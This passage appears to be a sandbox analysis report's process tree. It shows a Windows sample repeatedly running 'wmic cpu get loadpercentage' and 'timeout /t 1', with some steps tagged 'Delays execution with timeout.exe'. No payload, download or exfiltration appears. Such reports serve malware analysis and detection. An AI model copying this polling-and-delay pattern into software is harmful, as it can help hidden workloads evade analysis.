- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4720
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4396
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4024
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4548
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5072
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1616
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1824
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1468
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3408
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1800
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:512
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1924
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4696
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3528
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4880
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3996
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2368
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1808
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3164
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4936
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4024
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3672
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4340
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1648
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1612
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3416
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:796
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:184
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4232
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2712
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1968
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2464
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4396
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4720
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1796
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3432
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2836
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1048
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4300
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1800
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4052
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4744
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2712
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3736
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3628
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3692
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4804
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4468
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4624
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1644
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2756
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4576
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2836
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2784
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4000
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3828
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1552
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1244
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:796
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2512
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4836
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3488
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:908
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2428
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2416
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3028
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2696
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4776
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3084
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4936
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4192
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2176
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:848
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2968
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2744
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1264
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:512
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3980
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3528
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1692
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3708
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3628
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1488
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3432
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4444
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3144
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4624
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4388
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4452
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:388
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2892
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2232
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4368
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4880
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2512
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3276
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1116
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3720
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3236
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2428
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1772
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3028
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1608
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4072
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4776
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4284
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3084
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4832
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4032
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1972
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3752
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4336
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1800
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4696
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4264
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2500
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1668
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:860
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3236
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4332
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2416
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1608
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2808
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4624
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
